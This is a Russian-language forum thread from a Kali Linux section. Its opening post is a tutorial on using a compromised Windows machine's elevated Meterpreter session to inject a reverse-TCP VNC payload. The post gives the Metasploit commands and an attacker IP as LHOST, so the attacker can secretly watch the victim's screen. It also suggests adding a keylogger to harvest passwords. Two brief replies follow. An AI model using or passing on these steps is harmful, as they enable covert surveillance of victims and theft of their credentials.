Загрузка...

Захват VNC сессии на удаленном компьютере

Тема в разделе Kali Linux создана пользователем mrJollier 18 июн 2018. 509 просмотров

Загрузка...
  1. mrJollier
    mrJollier Автор темы 18 июн 2018 Всё ещё живой 540 15 фев 2017
    Здесь пойдет речь о том как использовать VNC -сервер на удаленном компьютере. Что такое VNC и зачем он нам нужен? Немного теории:



    Virtual Network Computing (VNC) — система удалённого доступа к рабочему столу компьютера, использующая протокол RFB (Remote FrameBuffer, удалённый кадровый буфер). Управление осуществляется путём передачи нажатий клавиш на клавиатуре и движений мыши с одного компьютера на другой и ретрансляции содержимого экрана через компьютерные сети.



    Сразу оговорюсь, что запущенный через шелл meterpreter’a VNC – сервер, к сожалению не позволит нам управлять этим компьютером.



    Вместо этого мы сможем наблюдать за действиями на мониторе жертвы, вовремя делать скриншоты экрана, собирая интересную информацию, параллельно включив кейлоггер, добывать пароли именно от интересующих нас аккаунтов и т.д.



    Приступим, как обычно, перед началом всех манипуляций открываем сессию meterpreter с повышенными привилегиями,

    [IMG]
    (с базовыми получалось на Windows 7. Win 8.1 и 10 только с повышенными), и пишем по порядку, нижеследующее:

    > use windows/manage/payload_inject

    > set payload windows/vncinject/reverse_tcp

    > set LHOST 192.168.0.18 (IP атакуещего)

    > set session 2 (Номер вашей сессии с привилегиями)

    > set handler true

    > exploit

    [IMG]
    Убеждаемся, что все идет успешно:

    [IMG]
    В результате этих действий будет открыто окно VNC – сервера:

    [IMG]
     
  2. Onorm
    Onorm 29 июн 2018 Заблокирован(а) 521 21 май 2017
    То-есть , как я понял так можно подключиться к любому ПК , зная его IP ?
     
  3. mrJollier
    mrJollier Автор темы 29 июн 2018 Всё ещё живой 540 15 фев 2017
    только если у того пк включены нужные порты
     
Top